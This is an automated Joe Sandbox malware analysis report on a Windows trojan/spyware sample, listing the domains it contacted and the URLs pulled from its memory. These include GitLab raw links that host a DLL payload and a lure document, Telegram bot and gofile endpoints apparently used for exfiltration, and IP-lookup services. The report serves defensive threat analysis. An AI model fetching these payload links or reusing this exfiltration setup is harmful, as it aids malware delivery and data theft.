      C:\Users\user\Desktop\e_sqlite3.dll0%VirustotalBrowse

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      bg.microsoft.map.fastly.net
      		199.232.210.172
      		truefalse
        		high
        google.com
        		172.217.16.206
        		truefalse
          		high
          gitlab.com
          		172.65.251.78
          		truefalse
            		high
            www.google.com
            		142.250.186.100
            		truefalse
              		high
              api.ipify.org
              		172.67.74.152
              		truefalse
                		high
                ip-api.com
                		208.95.112.1
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=falsefalse
                    		high
                    https://www.google.com/false
                      		high
                      https://gitlab.com/app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=falsefalse
                        		high
                        https://api.ipify.org/false
                          		high
                          https://google.com/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://github.com/icsharpcode/SharpZipLib3nNnzvybxiy.exefalse
                              		high
                              https://github.com/mono/linker/issues/1731nNnzvybxiy.exefalse
                                		high
                                https://github.com/mono/linker/issues/2025nNnzvybxiy.exefalse
                                  		high
                                  https://api.telegram.org/botnNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                    		high
                                    https://gitlab.com/-/sandbox/;nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/intl/en/about/produEnNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        https://photos.google.com/?tab=wq&pageId=nonenNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/intlnNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://snowplow.trx.gitlab.netnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                              		high
                                              https://collector.prd-278964.gl-product-analytics.comnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                		high
                                                http://ip-api.com/json/ynNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpfalse
                                                  		high
                                                  https://news.google.com/?tab=wnnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYnNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidnNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                        		high
                                                        http://www.google.com:443/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1E53000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1EC3000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/nativeaot-compatibilitynNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                            		high
                                                            https://www.google.com/finance?tab=wenNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://lh3.googleusercontent.com/ogw/default-usernNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.telegram.org/botinNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                    		high
                                                                    https://github.com/ericsink/SQLitePCL.rawdnNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                      		high
                                                                      https://www.blogger.com/?tab=wjnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.recaptcha.net/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.google.com/imghp?hl=en&tab=winNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/shopping?hl=en&source=og&tab=wfnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/soap/encoding/nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name(DefaultRoleClaimTypexhttp://schemas.micronNnzvybxiy.exefalse
                                                                                  		high
                                                                                  https://api.gofile.io/serversnNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                    		high
                                                                                    https://aka.ms/nativeaot-compatibilityynNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                      		high
                                                                                      https://new-sentry.gitlab.netnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://aka.ms/dotnet-illink/comnNnzvybxiy.exefalse
                                                                                          		high
                                                                                          https://www.google.com/intl/en/about/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.google.com/preferences?hl=ennNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.youtube.com/?tab=w1nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.google.com/history/optout?hl=ennNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://gitlab.com/admin/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://books.google.com/?hl=en&tab=wpnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://gitlab.com/-/speedscope/index.htmlnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/wsdl/nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                          		high
                                                                                                          https://aka.ms/nativeaot-compatibilityYnNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.google.com/recaptcha/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.newtonsoft.com/jsonschemanNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                		high
                                                                                                                https://github.com/dotnet/runtime/issues/50820nNnzvybxiy.exefalse
                                                                                                                  		high
                                                                                                                  https://calendar.google.com/calendar?tab=wcnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://github.com/ericsink/SQLitePCL.rawnNnzvybxiy.exefalse
                                                                                                                      		high
                                                                                                                      https://urn.to/r/sds_see12https://urn.to/r/sds_see2nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.google.com/&ec=GAZAAQnNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF144C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://www.sqlite.org/rescode.htmlnNnzvybxiy.exefalse
                                                                                                                            		high
                                                                                                                            https://www.google.com/intl/en/about/products?tab=whnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://github.com/mono/linker/pull/2125.nNnzvybxiy.exefalse
                                                                                                                                		high
                                                                                                                                https://github.com/mono/linker/issues/1895vUsingnNnzvybxiy.exefalse
                                                                                                                                  		high
                                                                                                                                  https://csp.withgoogle.com/csp/gws/other-hpnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1D84000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1D99000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://gitlab.com/hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?innNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F25000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://system.data.sqlite.org/XnNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.newtonsoft.com/jsonnNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://www.google.com/historwnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://docs.google.com/document/?usp=docs_alcnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://gitlab.comnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schema.org/WebPagenNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2083000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF209E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://github.com/dotnet/runtimenNnzvybxiy.exefalse
                                                                                                                                                    		high
                                                                                                                                                    https://www.google.com/webhp?tab=wwnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://api.ipify.orgnNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://ip-api.com:80/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1D12000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://aka.ms/dotnet-warnings/nNnzvybxiy.exefalse
                                                                                                                                                            		high
                                                                                                                                                            https://github.com/dotnet/efcorenNnzvybxiy.exefalse
                                                                                                                                                              		high
                                                                                                                                                              https://maps.google.com/maps?hl=en&tab=wlnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://gitlab.com/assets/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://ip-api.com/json/nNnzvybxiy.exe, 00000000.00000002.1577285512.00007FF67885C000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://gitlab.com:443/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F25000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/inNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://aka.ms/serializationformat-binary-obsoletenNnzvybxiy.exefalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://aka.ms/binaryformatternNnzvybxiy.exefalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://apis.google.comnNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF144C000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2016000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF204C000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2000000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2068000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DED000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF20BA000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1E53000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF20EC000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF20D0000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1EC3000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2083000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF209E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://sentry.gitlab.netnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://api.ipify.org:443/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1C79000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://schemas.xmlsoap.org/soap/encoding/YnNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      http://www.google.com/mobile/?hl=en&tab=wDnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://github.com/JamesNK/Newtonsoft.JsonnNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://play.google.com/?hl=en&tab=w8nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s96nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2083000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF209E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://api.gofile.io/serversYnNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://www.google.com/history/optnNnzvybxiy.exe, 00000000.00000002.1573250195.000001DBF1475000.00000004.00001000.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://drive.google.com/?tab=wonNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://github.com/mono/linker/issues/1416.nNnzvybxiy.exefalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://github.com/ericsink/SQLitePCL.rawXnNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://mail.google.com/mail/?tab=wmnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://james.newtonking.com/projects/jsonnNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://github.com/mono/linker/issues/1981nNnzvybxiy.exefalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerifynNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://gitlab.com/-/sandbox/nNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://lh3.googleusercontent.com/ogw/default-user=s24nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF209E000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://customers.gitlab.comnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1F2B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://github.com/mono/linker/issues/1906.nNnzvybxiy.exefalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://translate.google.com/?hl=en&tab=wTnNnzvybxiy.exe, 00000000.00000002.1573550610.000001DBF1DA1000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high

                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          172.217.16.206
                                                                                                                                                                                                                          		google.comUnited States
                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                          208.95.112.1
                                                                                                                                                                                                                          		ip-api.comUnited States
                                                                                                                                                                                                                          		53334TUT-ASUSfalse
                                                                                                                                                                                                                          172.65.251.78
                                                                                                                                                                                                                          		gitlab.comUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                          142.250.186.100
                                                                                                                                                                                                                          		www.google.comUnited States
                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                          172.67.74.152
                                                                                                                                                                                                                          		api.ipify.orgUnited States
                                                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                          Private

                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                          Analysis ID:1590652
                                                                                                                                                                                                                          Start date and time:2025-01-14 12:47:12 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 7m 30s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:24
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:nNnzvybxiy.exe
                                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                                          Original Sample Name:531da4002b1052ababc8cffc1db0ac39dc616eb051faca146a393da3dfa478eb.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal80.troj.spyw.winEXE@16/21@5/6
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 96%
                                                                                                                                                                                                                          • Number of executed functions: 12
                                                                                                                                                                                                                          • Number of non-executed functions: 92
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.68.129, 184.28.90.27, 52.113.194.132, 199.232.210.172, 52.111.236.32, 52.111.236.33, 52.111.236.34, 52.111.236.35, 20.189.173.2, 2.21.65.149, 2.21.65.130, 13.107.246.45, 40.126.32.140, 20.109.210.53
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, time.windows.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, nleditor.osi.office.net, e2676
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                          No simulations

                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          208.95.112.16kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                                          #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                                          rordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          findme.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                                          tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=61439
                                                                                                                                                                                                                          Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                                                                                                                                                          • ip-api.com/json
                                                                                                                                                                                                                          resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • ip-api.com/json/?fields=225545
                                                                                                                                                                                                                          F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • ip-api.com/line/?fields=hosting
